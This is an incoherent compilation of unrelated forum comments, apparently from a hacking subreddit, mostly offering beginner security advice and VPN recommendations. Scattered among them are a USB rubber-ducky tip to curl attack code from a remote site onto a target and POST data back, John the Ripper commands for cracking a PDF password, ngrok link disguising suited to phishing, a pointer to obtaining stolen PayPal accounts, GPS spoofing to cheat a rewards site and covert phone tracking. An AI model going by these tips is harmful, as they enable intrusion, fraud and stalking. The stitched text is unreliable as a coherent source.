SE 101, basically seems like they went on weleakinfo or ihavebeenpwned. Typed in your email in the db and found a compromised pass. Don’t fall for this shit. Make sure u use Lastpass manager and Mullvad Vpn. Stay safe.
Ok so you're getting started in information security. Everyone tells you that Kali is where it's at and everyone is very opinionated about it. It can be a real pain to use but there are lots of tutorials on YouTube about tools and how to set it up so it can be an amazing place to start.
Check out their website for details on the types of installs and general information. https://www.kali.org/docs/introduction/
The community on there has tons of resources. As far as getting started, you'll need to learn a little about Linux and terminal commands. I suggest looking up "Linux basics" and Linux terminal basics on YouTube before starting with Kali.
I hope this helps.
Sort of a joke, but brings up a good point: you say “learn from scratch” but my first “hacking” experience was learning how to put blocks where they don’t normally go by editing the project JSON in scratch
Formatting is absolute shit since I'm on phone. Download and install gnupg for windows if on Windows or if your in Linux it's probably installed if not install it with your package manager Download John the ripper from here. Download Perl from here (depending in your os you might have it pre-installed but if your in Windows download strawberry Perl.) Open cmd or terminal and write: gpg --receive-keys 05C027FD4BDC136E gpg --verify your-downloaded-john-signature.sign If it says that the signature is correct it should be ok. If not download John again. Ignore any error like public key not signed. Now do: 7z X your-compressed-john-binary.tar.gz 7z X your-compressed-john-binary.tar cd where-the-binaries-extracted cd the-only-folder-you-see cd run cpan install Exif::Tools perl pdf2john.pl name-of-your-encrypted-pdf.pdf > hashes_to_crack john hashes_to_crack It should start to crack. Keep in mind it will probably take a lot of time to crack the hash.
I’ve used it a lot in the past and it was great. The price was justified for the support, numbers of servers, and them placing user privacy as their top priority. Also, it has some pretty extensive features and settings if you want to really customize your VPN connection. Looking around though at different reviewers and ratings, I have heard a lot of good things from NordVPN so it might be worth looking into as well.
Practical Malware Analysis by Andrew Honig and Mike Sikorski:
I’m a proud owner of a signed copy by Andrew 😁
Nice list.
Guys, if your ISP is blocking the connection then simply use any of these 5 VPNs recommended by other Redditors for torrenting.
I am using NordVPN and CyberGhost, KAT is opening 24X7.
Best is subjective. Do you want it part of five/thirteen eyes? Logging? Governance & compliance? After I tried most for sale I built my own for a few years. Now I use whatever falls into my specs and use case, Mullvad is quick, built on wireguard and damn good about privacy AND security.
As for AV apps, this is heavily dependent on your mobile OS
I would strongly recommend The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (2nd Edition). This book is an excellent guide for beginners looking to get their foot in the door, and explains the fundamental concepts of pentesting in a very accessible manner. The book is not terribly long, but packs in all the essential information to build upon with dedicated learning through specialized books or courses. Additionally, it feels like a quick read due to the engaging writing of the author, and the book is indexed/chaptered in a way that makes finding individual lessons or concepts a breeze. I've linked the book on Amazon below, I can't recommend it enough!
https://www.amazon.com/dp/B00DSNSQAC/ref=cm_sw_r_cp_apa_-.ibGbBG8MPRQ
Are you sure your email hasn’t been hacked as well? Any chance you had the same password for both? If they have your account and have changed the recovery email/primary email, your best bet might be to deal with Facebook as you probably won’t get too far trying to figure out the new credentials. When you do get the account back, I highly recommend enabled 2FA on it, and any other account you might use. Also, https://haveibeenpwned.com/ and https://haveibeenpwned.com/Passwords are your friends.
Actually your ip address is the link, if you want to send the link to a person, you need to have open the port 80 using port forwarding, and that I will say now is something that nobody will say you but is very good, I use the most times Gmail to change the URL name, so if your URL is your ip you can make it appear to be another website. Other thing you can use if you don't want to do port forwarding is download Ngrok, I will give you the amazing opportunity of go straight to the internet an see what is ngrok, and how it works, here you have a link to the site, if you have any issues contact me.
-SS
If you're doing this on a phone you probably need a geolocation changer or whatever those are called..
Fake GPS Go location spoofer free
https://play.google.com/store/apps/details?id=com.incorporateapps.fakegps.fre
Something like that.. ^^.
Along with a vpn that allows choosing a location (like orbot)
https://play.google.com/store/apps/details?id=org.torproject.android
Set of those to the same location.. Clear you cache cookie and all those files.. And it should probably work.. (idk about Swagbucks but it does work normally)
On PC I think there's a plugin called browsec that does the trick..
You could install dropbear via termux and let it run in background, but you'd need termux:boot if you'd like to restart it without needing to manually start the ssh server
So your ducky needs to be prepared for windows (curl is wayyy different on windows, so you'll have to check that out) and then all other computers use the same curl, so you could curl cheat.sh for example. That would let you download the output from https://cheat.sh, a website full of tutorials to be viewed from command line.
Let's say you have a website that hosts a .txt file containing a whole bunch of python code (it doesn't matter that it's a .txt) you would run curl https://yourwebsite.com/notes.txt > hacks.py
. This let's you do tons of stuff! Your txt could have huge packages needed to perform other hacks, or your website could be used to receive data, in which case your ducky would need to be programmed to POST curl to your website.
great, have a laptop with Virtual Box or VMware player , install Kali , VM, Windows VM and Rapid7 Metasplitable VMor OWASP VM , subscribe to Youtube channels that talks about Ethical hacking and Penetration testing , here is a list of some good channels
Hackersploit
LiveOverFlow
Hackerone
or if you like to follow a book that can guide you from the beginning see this book
to practice you can use these websites
Vulnhub
Portswigger
hacktheBox
Bwapp
I have this one Learn Ethical Hacking From Scratch.
I think its not bad but course content is a little bit poor and hacking methods old.
If you want to start hacking
this books very good. Also u dont have money you can also find it on Google..
​
That depends on what type of progress Microsoft is trying to prevent. If Wine/React evolve in a such way of being capable of emulate any program that runs on Windows 10 then that's a point because it may encourage people to use Linux or macOS instead. Microsoft doesn't want that because it will lose market share and also many users that are providing telemetry data.
We have a good example which is Proton. This project is based on Wine and it seems to work pretty well with the newest games. I doubt that the XP leak would help them to make significant progress, because the Win32/DirectX API has changed a lot since then[1]. But the leak itself may be sufficient for issuing a lawsuit, which is bad for any project, regardless of the size.
It's very interesting topic to discuss, but we need more strong arguments (with proofs) to be able to tell what really happened and why.
[1] If not, XP would be able to run many recent games.
By default is missing most of the kali tools. If you have the space I’d suggest running “sudo apt install -y kali-linux-large” to get the rest of the tools.
This tutorial will show you how to get the GUI running from windows. https://www.kali.org/docs/wsl/win-kex/#install-kali-linux-in-wsl2
https://www.kali.org/downloads/
Get the Web or Torrent download, doesn’t matter. It’ll give you a ISO file.
Two options from there. Either install it virtually on a VM using VirtualBox or something similar.
Or...
Use Rufus (tool) to burn the iso to a USB drive to boot it drom there.
Hey sorry for the late reply, I have been busy 😘 As a start you could check this site out: https://www.cybrary.it/coursecatalog/
You should also watch this playlist: Explained!: http://www.youtube.com/playlist?list=PLn-akFzjAR1_106BDDI8pMJoCiXZLQog2
This will help you learn the basics. Experience with linux, c, python, html and javascript will also help. Good luck 😎
this link is better, basically a tutorial into getting darkweb paypal accounts, so you can make more bitcoin, it has a little HTML coding in it so hopefully you know how to work with HTML
So, I only got passable at asm by using MASM and lots of tutorials for x86 along with this book:
Assembly Language for Intel-Based Computers (3rd Edition) https://www.amazon.com/dp/0136603904/
Then I used C to code simple shit and used the compiled output like shellcoding. You can just take the C code and put it directly into memory for execution. Lil poking in Immunity and you are good to go for memory registers. Def peek at shellcoding if you haven't yet.
The reason I recommend 50Mbps speeds was due to this very reason, but just like the article said you can still use VPN.....except the provider (Betternet, HotspotShield, etc....) can still see your info: Source I suggest Tor mainly because there isn't a specific company or group that runs it. But don't forget there will always be someone who can see what you're doing. This isn't Mr. Robot WILL HAVE OBSTACLES. And for the Windows problem...face palm you can use it, but tools will be harder to find. So many tools come with Kali Linux. You can master the basics of pen-testing within a month. Dude if I say "recommend" it means it's the best and easiest way.
My favourite is IPVanish a look. They both allow torrenting as well, if that's what you're looking to get out of it.
Dunno what this dude is on about, HMA definitely logs and is not what you're looking for at all.
It's unlikely a typical home has a static IP address so the biggest concern is someone clicking something they shouldn't. And it's a real concern especially if there are members of the family who may be looking at idk... lots of adult content. One of the most useful things you can do is set up Pi-hole and be your own dns server. You'll be amazed at how many domains are blocked. It will be in the thousands. https://pi-hole.net/ Other than that, don't let family members turn off Windows Defender because "it keeps stopping them for doing things". I honestly don't think anything else will be a great return on your time/money investment. You could absolutely buy a small Palo and use it to scrub your traffic but I think your family would do better spending $1000 on something more fun/useful.
If you want to use a free VPN then, I will prefer you can use ProtonVPN. This is a free VPN for everyone along with limited features. But if you want to try another VPN then, I will suggest you can also check the list of free VPNs along with their specifications.
Well, I’ve never used it either, but when I was looking for a VPN, I indeed checked it out, along with many others. Also, note that I love ProtonMail itself and think it’s an amazing way to obtain privacy for free, but I still have my reserves when talking about their VPN due to how sensitive the informations that go through them can be. As I mentioned in my comment above, good-hearted benevolent services are extremely rare in the IT sector (that’s more of a hacker mindset, with open-source religion, etc.).
All in all, it really, really depends on whether you’re a regular user who just wants relative privacy in public space. If you’re more than that (pentester, black hat, etc.), then I’d say it’s vital you look for a paid VPN with specific features. Here, and probably the most trustable free solution out there for regular users. But… we’re not supposed to be regular users on this subreddit, hence my reply.
Besides that, if you want more details about the most famous VPNs on the market, That One Privacy Guy did a nice comparison chart.
Hope it helps a bit, buddy. I don’t have personal experience to share so I’m just mentioning the conclusions of my researches at the time. Free = no-go for a white or black hat; Paid = not necessarily good either, requires further investigation.
Hey bud. Honestly, if I were you, I’d stay away from free VPNs, depending on what you’ll do on your laptop in public spaces. Let’s put it that way: they have to make a living out of the service they provide. If the service is free, this means the product they sell is… you.
Of course, a free VPN will do the job of concealing you on public networks (from other users/people with a monitor mode NIC), but at the cost of your traffic going through another stranger’s tunnel. At least, when you pay for the service, it the relation becomes contractual.
I’m a bit paranoïd, so I’m using Mullvad. Their pricing is fair, they’ve never had any (known) exposure/breach in 10 years (as opposed to the ones you hear about everywhere such as NordVPN and co), and they accept cash payment.
If he's interested in security/pentesting stuff, there's a decent book Black Hat Python that goes through using Python for some security tasks. It's not totally beginner friendly, but with motivation from interest in security I'm sure they could get through it.
Python or Java is fine. It's really up to him to decide. The best you can do is share some resources to help him along his journey. I'd even share this post and let him read the answers. I think Python would be a better start for security related stuff, and I think once he really dives into it he'll quickly want to play with C/C++ as it allows lower-level control of memory and stuff like that. I own this book, Hacking: The Art of Exploitation, and while pretty advanced I found it helped give a good understanding of what programs do under the hood.
I know PureVPN, IPvanish, EarthVPN, HideMyAss, Betternet, UFO, Proton, Seven, FastVPN, Rabbit, and bunch more have all turned over logs to Law Enforcement while advertising no logging policies.
Someone should start a searchable database of which VPN providers have been caught, and which have held up in court.
This, you pay with your data. If you just wanna get around public wifi blocked sites or some shit you’ll be fine, but otherwise stick with a paid service. Only free one I recommend is ProtonVPN. Their free servers have 3 locations (US, Netherlands, and Japan) with 10 -100 servers per location (most are in the US and Netherlands). Paid users pay a bit of a premium to cover the free users, and the free speeds aren’t as good. However, you can maintain your privacy. Otherwise use ProtonVPN premium or any other paid VPN based in a privacy-focused country.
Then name one. The only one that i might trust is ProtonVPN because they are based in sweden where no one else has jurisdiction and sweden has the strictest privacy laws in the world. But they are government funded and their ProtonMail project was caught logging IP's. This just reduces ProtonVPN's creditiblity.
Most others get in the news regularly for being caught, if you hang out in r/cybersecurity you see it regularly. Also your use of "fr" makes me think you are probably some gen z kid who doesn't even know what a folder is.
A paid for VPN is pointless because you are just shifting the knowledge of your internet traffic from your ISP to a VPN company. The reality is, 80% of the internet(not just websites) uses SSL encryption which is on par with the encryption of a VPN. With a VPN you are encryption already encrypted data, the only difference is, when you (rarely) make an unecrypted connection then the VPN company can see all that data but no one else can instead of everyone being able to see it. Also the VPN company still knows your real IP and they probably log it. And companies can be subpoenaed. So no true privacy.
If you don't care about privacy and just want to look like you are coming from a different country, then use any VPN you want. ProtonVPN has a free trail or something.
If you do want privacy, and if you know your way around a linux machine (or the easy way is a raspberry pi) then you can ask r/selfhosted how to set up your own VPN. There are plenty of automated scripts that can setup a wireguard/openVPN server on a raspberry pi. Just one command and poof!
But the easiest if to just use tor. It is far more sophisticated, far more decentralised, and lines no ones pockets.
The cheapest non-free ProtonVPN package is 3-5 bucks a month depending on the payment period. Many non-KVM VPS packages are cheaper than that and still powerful enough for running a VPN server.
On the other hand, ProtonVPN and plenty of other VPN providers don't require any personal information to register, and at least they mix multiple user traffic in a single IP, unlike VPS providers.
Hi, thank you for this very long post. It was very informative, but I have a question. What about doing things through like, a VPS and then connecting to said VPS using TOR, and all data going out is also going, through TOR. My friend said a VPS would be good enough, but is it? A VPN seems good from what you've told me. Would ProtonVPN be fine? Proton is free, from what they say is encrypted and I can't find anything about them leaking user data. I think I understand the proxy chain thing, but now I have another question. What would be better, a VPN or proxy chaining?
Unironically just don’t use any VPN at all rather than using Nord. Unless you’re sailing the seven seas and don’t want to get letters from your ISP, Nord has zero privacy whatsoever.
I have never used Express so I cannot comment, but I assume it’s not much better (if at all).
I recommend either iVPN or Mullvad. Keep in mind though, VPNs are fundamentally about trust, and as such you should never trust any one company 100%. Be prepared to abandon ship should any provider appear even the slightest bit disingenuous.
Proton VPN is one of the best VPNs, made by a bunch of rocket scientist, their encryption algorithms have been so secure that the US government has been trying to stop them. Even their free tier VPN makes everyone else's look like garbage.
If you want anonymity so you don't get hacked at the coffee shop for checking your bank account like a idiot or doxxed from Xbox, Proton is by far the best way to go. They also have servers all over so you can unlock geo-locked content for Netflix or whatever.
ExpressVPN is a second runner up, they more geared toward content unlocking and talking about the speed of the streaming. They are pretty robust for identity protection but Proton goes a step above with even identity protecting email etc.
If you're a journalist or live in a country stifled by government censorship I'd get Proton.
If you want to use one of these two, I would personally recommend ExpressVPN.
Over the years, NordVPN have proven again and again that they cannot be trusted and that they collect user data. I remember that their was a security breach in their systems some time ago and did not even mention that to their users. If I remember correctly, it was discovered and disclosed by an independent organization.
On the other hand, ExpressVPN have proven that they are true to their word - their servers run on RAM only and they don't store personal information. A few years ago, the Turkish government physically seized one of ExpressVPN's servers and found nothing on it.
​
However, if you want to use a VPN for privacy, you should probably go with Mullvad, as they don't store any personal information (not even your email) and they also accept payment via crypto.
I don't know how to hack games but you must be careful about installing apk, there may be a virus in it.
There is a book about it (Maybe not for APKs):
https://www.amazon.com/Game-Hacking-Developing-Autonomous-Online/dp/1593276699/
You need to learn reverse engineering and maybe need to know about some cryptography
Leoxsys. This is about the cheapest dongle you can get for packet injection in India. It does not have a great range, but it's a decent learning tool for beginners.
The router you use can still see everything it would if you were not using a vpn since you have have to use it to access the internet. The VPN just make it hides you from other devices in the network.(This is typical the default configuration) ProtonVPN will use DHCP to set your DNS server. Man in the middle attacks are essentially impossible on sites that are using up to date HTTPS. Your probably fine just don’t use sketchy WiFi in general if it can be avoided.
NordVPN aren't free but they work really well for first time users since both are straight forward, especially Nord's
So my initial thought was recommending BlackArch Linux. For RPI4 you would install Arch Linux (arm version) then install BlackArch on top of the new Arch install.
This link shows how to install BlackArch on top of Arch - https://www.blackarch.org/downloads.html#install-repo
So above was my initial thought, then I saw newbie and thought Arch Linux and newbie didn't necessarily mix. The easiest route is to use Kali Linux's arm download and you can tell the installer not to download any tools (in place of you doing that later)
>KRACK attack
That is a an evil twin attack. You cannot crack WPA rainbow tables as they are salted with the SSID (and that is unique)
​
https://www.cloudflare.com/en-ca/learning/security/what-is-a-krack-attack/
Go to https://www.virtualbox.org/wiki/Downloads Create a virtual machine so you don't have to worry about viruses or malware. Use the snapshot feature right before you download something questionable in character and if it contains a virus or malware, then simply use the snapshot feature to go back to where you were before with no damage done.
Try wifite2 https://github.com/derv82/wifite2
Due to some weaknesses in certain protocols it can even find very strong passwords for you. If not, you'll get some files that you can upload to hash cracking sites that will do the work for you.
Having said that, the router password is not the same thing as the network password.
Oh, hellou.
There's for everyone. Nobody need to follow you :3
I’m guessing it would involve illegal activities like breaking into phone carrier systems. When police trace a call, they’re working with carriers (or within their systems, anyway) after they’ve gotten court orders to allow them to do so.
Also, it seems to me that most people on this sub aren’t into doing illegal things, and you’ve got a nice sounding, there’s no telling what the “real” need is here (maybe you want to stalk an ex!).
Assuming it’s really your uncle, and that you have access to install things on his phone, apparently this app doesn’t require data usage to give the phone’s location (it gives approximate network locations when data is off, exact GPS locations when it’s on). You could install it on his phone (assuming it’s running android).
https://play.google.com/store/apps/details?id=com.fsp.android.c&hl=en
On Linux use: apt-get install imagemagick pacman -S imagemagick yum install imagemagick dnf install imagemagick xbps-install imagemagick
mogrify -strip your_filename.jpg
Source: https://winaero.com/blog/remove-personal-information-photos-linux/
On Windows: Open the folder that contains the photos you want to remove EXIF data from. When the folder opens, right-click on the photo you’d like to rid of EXIF data and select Properties.
When the properties box opens, click on the tab that says Details. You’ll see the EXIF data of your chosen photo. To get rid of this data, you’ll find a link saying Remove Properties and Personal Information at the bottom. Click on it.
On the following screen, you’ll find two options to remove the EXIF data. If you select the first option, it’ll remove all the possible metadata from your photos. The second option lets you selectively remove EXIF data.
Choose the option you’d like to proceed with and click on OK.
Source: https://helpdeskgeek.com/how-to/how-to-remove-exif-data-from-your-photos/
There’s nothing wrong with kali. It can just be really frustrating and time consuming when you’re trying to learn. Should not be used as a daily driver though.
Plus it has tools you’ll never use or even know they are there.
It’ll be beneficial to learn Linux with something like Ubuntu then getting frustrated with kali.
https://www.kali.org/docs/introduction/should-i-use-kali-linux/
Check out Kali, they are easy to use, tons of features, and it works well with raspberry pi.
https://www.kali.org/news/raspberry-pi-4-and-kali/
I have a small 64gb sd card I use, holler if you run into problems setting it up!
They are not a scam but I don't know that much about this company but perhaps some others can comment: Windscribe VPN
They have a 2gb free tier - nothing needed at all.
They have a 10gb tier if you provide an email address.
They seem to be based in Canada.
I wrote a Blog Post about this on dev.to! 😀
it's a personal list. Ask anything you want! I love when I hear people wanting to read books about cyber Security!
Make sure it's your car and you're not voiding your warranty but there's a ton out there about this. Check out last year's black hat and defcon talks on it. Also there's always rolljam. https://www.hackster.io/news/hacking-a-car-s-key-fob-with-a-rolljam-attack-7f863c10c8da
+1 NordVPN is what you should go with. Not free, but trust me, you'll regret going with a free service. They hijack your connection and do all sorts of shady s***. Nord is like $1 a month if you go with their 2 year package, I'd say it's pretty close to free.
As far as I know, a lot of people are trading bitcoin today. It’s so popular and I also started to investigate this field. I am currently using bitcoin trading platform to know the last news about cryptocurrencies and bitcoin in general.
Forex used to be the main trading platform but I think that it comes to crypto today. I suggest investigating all potential income opportunities.
Not really, just a virtual machine that gets leased to a client (the client in this case being the hacker) via a service like AWS/azure
You can very well learn by yourself (although you cannot expertise the field), there are a lot of reading material available online. To begin with, you should be flair with a handful of languages including C, Java, PHP, Perl and Python. Apart from these basic languages you also need to arm yourself with thorough knowledge of markup based languages which include HTML, XML, and data formats such as Protobuf and Json. Also learn OS and Network Systems. If you need any ethical hacking tools, to check the security apparatus of their organization’s networks and look out for any vulnerabilities and loop-holes; try with MetaSpoilt. There are more tools to suit your needs - check here
People in the comments. Don't bother replying if you don't know what a WHOIS lookup is.
It's a registered DNS name by a Bulgarian org called NetInfo. Whether the trail goes deeper or what is it I don't know or care but you can find details here.
download virtualbox and then download parrot os Pick the one in the bottom left that says OVA. Then import the .ova into virtualbox. You can also do this with kali but parrot is nicer. This is your attack machine. Next pick a beginner machine from vulnhub -- This is the target machine. Follow the first step and make sure the format is ova. Now go into the machine settings for each one and make sure both are on host only adapter as it's dangerous to have the target machine connected to the internet since its vulnerable by design. I think this is a standard lab setup for most cases. You can also take snap shots of both machines so if you frig anything up you can load it fresh
Depends what you mean. Kali is just an OS. Is it how Linux works you want to know or is it the tools like metasploit etc? Offensive security have docs for kali here https://www.kali.org/docs/ if that’s what you are after
Don't bother disabling it run a live operating system you can make them with this just pick the operating system of your choice https://rufus.ie/ or install a second internal hard drive and leave it unplugged when you are not using it.
Here is a class on USB droppers, it introduces you to some key concepts. There are classes on Windows admin stuff also just search for them and watch the videos. Look for things like group policy and remote administration ... https://www.cybrary.it/course/usb-drop-attack/
This 100%. Twitter is not something you want to hack unless it is your own account. If you go in blindly and get reported for having hacked an account, that's jail time. With that being said though, I do like the mentality of wanting to better yourself in the field. https://www.cybrary.it is a great site to start at. I highly recommend starting with Networking to learn the OSI model and how it works, and from there branch off into Pen-testing. Pen-testing will teach you a ton of useful skills such as Social Engineering, staying mostly anonymous (no such thing as being fully anonymous on the internet of course) and so much more! There are tons of free CTF (Capture the flag) VM's you can practice on which makes you figure out how to find and exploit vulnerabilities, which you can get at vulnhub. Hope that helps and definitely ask questions along the way if you need some hints to point you in the right direction!
Start here, but understand it doesn't resolve to a street address. What you'll get is the providers name and approximate range of the subscriber's location.
Anything you want to do, you should learn the basics how the technology works first, then you will have a foundation of knowledge to build upon instead of flying blind. I have used httrack for years, it's still great https://www.httrack.com/
You could start going though https://automatetheboringstuff.com until you have the basics. Once you have the first few chapters down you can practice your skills on something like https://www.codewars.com/
Try and read "The Code book" by Simon Singh. Pretty good explanation how we got from early ceasar's to public key encryption. Also explains how the concept works very well. Even for a non-mathematician easy to understand, public key encryption is (or was) based on modular numbers - pretty good privacy (pgp) for example was invented based on this. Its a entertaining read, on top of that!
So the major issue is with the VPN provider. Some VPNs log user activity and doing so is a privacy issue regardless of if you’re using TOR with it. It doesn’t so much “affect the TOR process” as it does introduce a single point of failure for your anonymity. Using a proper anonymous VPN eliminates this issue and effectively hides your IP from the TOR nodes and your activity from your ISP in turn. I’d personally recommend ProtonVPN, they have a strict “no-log” policy and are very privacy-oriented.
Are comfortable on a command line? To be frank, I am a novice myself, but being familiar with a command line and perhaps *nix of some kind can’t hurt. There’s also an awesome book called Computer Security: A Hands-on Approach. I used it for a course that I thought would be a snooze but ended up being very interesting and informative.
There's overlap with car hacking and embedded systems hacking, you can look into the types of SBCs featured in vehicles and start with that. Also look into CAN BUS decoding and sniffing.
Samy Kamkar (of MySpace worm fame) has been doing lots of hardware hacking, and developed exploits around keyfobs. His talks about hardware hacking and key fob hacking is on youtube.
Alissa Knight was working on some car hacking as well. I believe she was working with Berla for some time now on their tools for vehicle forensics.
She wrote a book on car hacking . Its been out for a year now so it's fairly recent. As others have mentioned there's also the car hackers handbook, which has been around a while longer.
I suffered the same problem which you are facing right now So I did this and I recommend you to do the same
This is what i have done for not being tracked by my g suit
Thank you 😊
Penetration testing step by step guide book walk you through about how to embed a malware inside a picture or a PDF file https://www.amazon.com/Penetration-Testing-Step-Step-Guide-ebook/dp/B08NHYPBVZ/ref=mp_s_a_1_9?dchild=1&keywords=penetration+testing+book&qid=1609436854&sprefix=penetration+tes&sr=8-9
The author is Radhi Shatob and here is the link to Amazon, I got the printed book , very good quality colored bages https://www.amazon.com/Penetration-Testing-Step-Step-Guide-ebook/dp/B08NHYPBVZ/ref=mp_s_a_1_1?dchild=1&keywords=penetration+testing+step+by+step+guide&qid=1607662554&sprefix=penetration+testing+step&sr=8-1
I use PrivateVPN. I don’t remember the exact price but it’s reasonable. I’ve always had good luck with download speeds, their support is great, they keep no logs, they have plenty of server locations, and they’re in Sweden.
They also have a simple app or program that you can download on all ur devices to use (except your router. That’s a little more complicated.)
I highly highly recomend both TorGuard and expressVPN. ExpressVPN is by far most impressive and transparent in terms their "No Logging" policy. I believe that I pay 5 to 7 bucks every two or three months. My other fav is Torguard. I pay 14 bucks every quarter (4 months) for VPN that keeps up with my 1,000mbs download / upload speeds, over 200 server locations across the world, they allow port forwarding, and include their proxy network access which is great, as well as pgp email account. They also offer dedicated stream IP addresses, as well as a wealth of other services.
We published an app for Android on Google play. It has free VPN servers for a lifetime. The source of income is ads (AdMob). No logs kept. Your IP is hidden. There are in-app purchases for those who need top speed. But for daily tasks, the free version is good.
Please give it a try:
Beyond VPN on Google Play
I recommend learning Linux, I’m currently a first year Network Engineer and I’ve found that learning and understanding Linux has been a great start to a few things. 1. learning how to use navigate a shell (currently using bash) this is the place you run commands/create tools/scripts 2. Learning how an operating system truly works from the time it’s turned on to the time it’s turned off 3. Learn to program in Linux opens the door to something like Kali Linux (which is claimed “the Swiss Army knife” for hackers) 4. You can get jobs from getting certified in Linux (Comp TIA Linux+ Certification Guide) Fun fact “96.3% of the world's top 1 million servers run on Linux. 90% of all cloud infrastructure operates on Linux and practically all the best cloud hosts use it.” Reference Link Hope this inspires someone to embark on this great journey, it truly has opened doors for me and I look forward to one day claiming the title as Ethical Hacker 😉
can't tell the chipset by the screenshot
this one is great for the price https://www.amazon.com/Panda-300Mbps-Wireless-USB-Adapter/dp/B00EQT0YK2/
this one is the upper echelon IMO https://www.amazon.com/dp/B004Y6MIXS/ref=eat_a_dick_bezos
Well, now I realize I read the name wrong, the previous version supported monitor mode, I hastily checked the version, but I wanted to make a point that online sellers usually do not put monitor mode in the description ( I do not know why ), so usually: - See in the comments. - Search on net for cards who support monitor mode then search which network adapters have those cards, then but those adapters. - Just check directly on net which network adapter support monitor mode.
Here I will give you this example on amazon, I think this will prove my point, if you verify it, I will edit the above comment.
First off, this is really funny.
If you are using a VPN-service like NordVPN or ExpressVPN, and all of your DNS traffic is properly setup for these services, I'd wish them good luck sniffing out the traffic for your sexy sites with an incognito chrome tab. If of course she hasn't bugged you which would be even more hilarious.
Absolutely learn general IT before hacking, choose a focus of either networking or application development (or both are fine if you can). Tools are great, but don't be a skid, learn enough IT to make, modify and fully understand tools. And please learn the legal liabilities of hacking in your country, a lot of kids out their are going to jail right now cause they didn't realize the consequences for their actions. Here's a good book to get through before diving into hacking: Grey Hat Hacking.